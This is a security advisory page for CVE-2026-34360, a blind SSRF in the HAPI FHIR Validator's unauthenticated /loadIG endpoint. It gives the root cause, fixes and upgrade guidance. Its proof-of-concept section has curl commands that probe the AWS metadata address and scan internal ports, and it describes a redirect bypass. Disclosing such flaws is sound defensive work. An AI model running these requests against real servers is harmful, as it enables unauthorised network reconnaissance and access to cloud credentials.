CVE-2026-34360: HAPI FHIR: Unauthenticated Blind SSRF via /loadIG Endpoint Enables Internal Network Probing

Published Mar 30, 2026
·
Updated

Summary

The /loadIG HTTP endpoint in the FHIR Validator HTTP service accepts a user-supplied URL via JSON body and makes server-side HTTP requests to it without any hostname, scheme, or domain validation. An unauthenticated attacker with network access to the validator can probe internal network services, cloud metadata endpoints, and map network topology through error-based information leakage. With explore=true (the default for this code path), each request triggers multiple outbound HTTP calls, amplifying reconnaissance capability.

Details

Root cause chain:

1. LoadIGHTTPHandler.handle() reads the ig field from user-supplied JSON and passes it directly to IgLoader.loadIg() with no validation:

java // LoadIGHTTPHandler.java:35,43 String ig = wrapper.asString("ig"); engine.getIgLoader().loadIg(engine.getIgs(), engine.getBinaries(), ig, false);

2. loadIg() calls loadIgSource(srcPackage, recursive, true) with explore=true (IgLoader.java:153).

3. loadIgSource() checks Common.isNetworkPath(src) which only verifies the URL starts with http: or https: — no host/IP validation (Common.java:14-16).

4. The URL reaches ManagedWebAccess.get() which calls inAllowedPaths(). This check is a no-op by default because allowedDomains is initialized as an empty list, and the code explicitly returns true when empty:

java // ManagedWebAccess.java:104-106 static boolean inAllowedPaths(String pathname) { if (allowedDomains.isEmpty()) { return true; // DEFAULT: all domains allowed } // ... }

The source code has a //TODO get this from fhir settings comment (line 82) confirming this is an incomplete security control.

5. SimpleHTTPClient.get() makes the HTTP request and follows 301/302/307/308 redirects up to 5 times. Redirect targets are NOT re-validated against inAllowedPaths():

java // SimpleHTTPClient.java:88-99 case HttpURLConnection.HTTPMOVEDPERM, HttpURLConnection.HTTPMOVEDTEMP, 307, 308: String location = connection.getHeaderField("Location"); url = new URL(originalUrl, location); // No domain re-validation continue;

6. The server binds to all interfaces with no authentication (FhirValidatorHttpService.java:31):

java server = HttpServer.create(new InetSocketAddress(port), 0);

7. Errors propagate back to the attacker with exception details:

java // LoadIGHTTPHandler.java:49 sendOperationOutcome(exchange, 500, OperationOutcomeUtilities.createError("Failed to load IG: " + e.getMessage()), ...);

Redirect bypass: Even if allowedDomains were configured, the domain check in ManagedWebAccessor.setupSimpleHTTPClient() (line 31) only validates the initial URL. An attacker can host a redirect on an allowed domain that points to an internal target.

PoC

1. Start the FHIR Validator in HTTP server mode: bash java -jar validatorcli.jar -server -port 8080

2. Probe a cloud metadata endpoint: bash curl -X POST http://<validator-host>:8080/loadIG \ -H "Content-Type: application/json" \ -d '{"ig": "http://169.254.169.254/latest/meta-data/"}'

Expected: The validator makes a GET request to the AWS metadata service from its own network position. The error response reveals whether the endpoint is reachable (e.g., connection refused vs. parse error on HTML content).

3. Port scan an internal host: bash Open port — returns quickly with a parse error (content received but not valid FHIR) curl -X POST http://<validator-host>:8080/loadIG \ -H "Content-Type: application/json" \ -d '{"ig": "http://10.0.0.1:8080/"}'

Closed port — returns with "Connection refused" curl -X POST http://<validator-host>:8080/loadIG \ -H "Content-Type: application/json" \ -d '{"ig": "http://10.0.0.1:9999/"}'

4. Redirect bypass (if allowedDomains were configured): bash Attacker hosts redirect: http://allowed-domain.com/redir → http://127.0.0.1:8080/admin curl -X POST http://<validator-host>:8080/loadIG \ -H "Content-Type: application/json" \ -d '{"ig": "http://allowed-domain.com/redir"}'

The validator follows the redirect to the internal target without re-checking the domain allowlist.

Impact

An unauthenticated attacker with network access to the FHIR Validator HTTP service can:

- Probe internal network services — differentiate open/closed ports and reachable/unreachable hosts via error message analysis (connection refused vs. timeout vs. content parse errors) - Access cloud metadata endpoints — reach AWS/GCP/Azure instance metadata services (169.254.169.254) from the validator's network position - Map internal network topology — systematically enumerate internal hosts and services - Bypass domain restrictions via redirects — even if allowedDomains is configured, redirect following does not re-validate targets - Amplify reconnaissance — each /loadIG call with explore=true generates multiple outbound requests (package.tgz, JSON, XML variants)

This is a blind SSRF — the fetched content is not directly returned. Impact is limited to network probing and error-based information leakage rather than full content exfiltration.

Recommended Fix

1. Add URL validation in LoadIGHTTPHandler before passing to loadIg() — reject private/internal IP ranges and non-standard ports:

java // LoadIGHTTPHandler.java — add before line 43 if (Common.isNetworkPath(ig)) { URL url = new URL(ig); InetAddress addr = InetAddress.getByName(url.getHost()); if (addr.isLoopbackAddress() || addr.isLinkLocalAddress() || addr.isSiteLocalAddress() || addr.isAnyLocalAddress()) { sendOperationOutcome(exchange, 400, OperationOutcomeUtilities.createError("URL targets a private/internal address"), getAcceptHeader(exchange)); return; } }

2. Re-validate redirect targets in SimpleHTTPClient.get() — check inAllowedPaths() for each redirect URL:

java // SimpleHTTPClient.java — inside the redirect case (after line 98) url = new URL(originalUrl, location); if (!ManagedWebAccess.inAllowedPaths(url.toString())) { throw new IOException("Redirect target '" + url + "' is not in allowed domains"); }

3. Configure allowedDomains by default to restrict outbound requests to known FHIR registries (e.g., packages.fhir.org, hl7.org), or require explicit opt-in for open access.

4. Add authentication to the HTTP service, at minimum for state-changing endpoints like /loadIG.

Other sources

HAPI FHIR is a complete implementation of the HL7 FHIR standard for healthcare interoperability in Java. Prior to version 6.9.4, the /loadIG HTTP endpoint in the FHIR Validator HTTP service accepts a user-supplied URL via JSON body and makes server-side HTTP requests to it without any hostname, scheme, or domain validation. An unauthenticated attacker with network access to the validator can probe internal network services, cloud metadata endpoints, and map network topology through error-based information leakage. With explore=true (the default for this code path), each request triggers multiple outbound HTTP calls, amplifying reconnaissance capability. This issue has been patched in version 6.9.4.

MITRE

Affected Software

2 affected componentsFixes available
maven/ca.uhn.hapi.fhir:org.hl7.fhir.core<6.9.4
6.9.4
hapifhir Hl7 Fhir Core<6.9.4

Remediation

Recommended actions to resolve this vulnerability, in priority order.

  1. Upgrade

    Upgrade maven/ca.uhn.hapi.fhir:org.hl7.fhir.core to a version that resolves this vulnerability.

    Fixed in 6.9.4
  2. Upgrade

    Upgrade HAPI FHIR FHIR Validator HTTP service (/loadIG blind SSRF) to a version that resolves this vulnerability.

    Fixed in 6.9.4
  3. Configuration

    Add authentication to the HTTP service, at minimum for state-changing endpoints like `/loadIG` (the service currently runs unauthenticated in HTTP server mode per the described issue).

    FHIR Validator HTTP service (HTTP server mode) authentication = enabled
  4. Configuration

    Configure `allowedDomains` by default to restrict outbound requests to known FHIR registries (e.g., `packages.fhir.org`, `hl7.org`), or require explicit opt-in for open access (current behavior is described as empty list => allow all).

    FHIR Validator HTTP service allowedDomains = configured-to-allowed-FHIR-registries
  5. Configuration

    Before passing the user-supplied `ig` value to `loadIg()` (before line 43 per the described patch location), add URL validation that rejects private/internal IP ranges and non-standard ports.

    LoadIGHTTPHandler (LoadIGHTTPHandler.java) ig URL validation = reject-private/internal-addresses-and-non-standard-ports
  6. Configuration

    In the redirect case (after line 98 per the described patch location), re-validate each redirect URL by checking `inAllowedPaths()` for every redirect target; do not only validate the initial URL in `ManagedWebAccessor.setupSimpleHTTPClient()` (line 31 only validates the initial URL).

    SimpleHTTPClient (SimpleHTTPClient.java redirect handling) redirect target re-validation = re-validate-redirect-targets-with-inAllowedPaths

Event History

Mar 30, 2026
Advisory Published
via GitHub·05:21 PM
Data Sourced
via GitHub·05:21 PM
DescriptionSeverityWeaknessAffected Software
Mar 31, 2026
CVE Published
via MITRE·04:56 PM
Data Sourced
via MITRE·04:56 PM
DescriptionSeverityWeakness
Data Sourced
via NVD·05:16 PM
DescriptionSeverityWeakness
Data Sourced
via NVD·05:16 PM
Affected Software
Free Weekly Intel

Don't miss critical vulnerabilities

Join thousands of security professionals who receive our weekly digest of trending CVEs, zero-days, and exploited vulnerabilities.

No spam. Unsubscribe anytime.

Frequently Asked Questions

1

What is the severity of CVE-2026-34360?

CVE-2026-34360 has a high severity rating due to its potential for unauthenticated access and server-side requests.

2

How do I fix CVE-2026-34360?

To fix CVE-2026-34360, upgrade the affected HAPI FHIR package to version 6.9.4 or later.

3

What is the impact of CVE-2026-34360?

The impact of CVE-2026-34360 is that it allows an attacker to make server-side HTTP requests to arbitrary URLs, potentially leading to data exposure.

4

Which software versions are affected by CVE-2026-34360?

Versions prior to 6.9.4 of the ca.uhn.hapi.fhir:org.hl7.fhir.core package are affected by CVE-2026-34360.

5

Who can exploit CVE-2026-34360?

An unauthenticated attacker with network access to the FHIR Validator service can exploit CVE-2026-34360.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203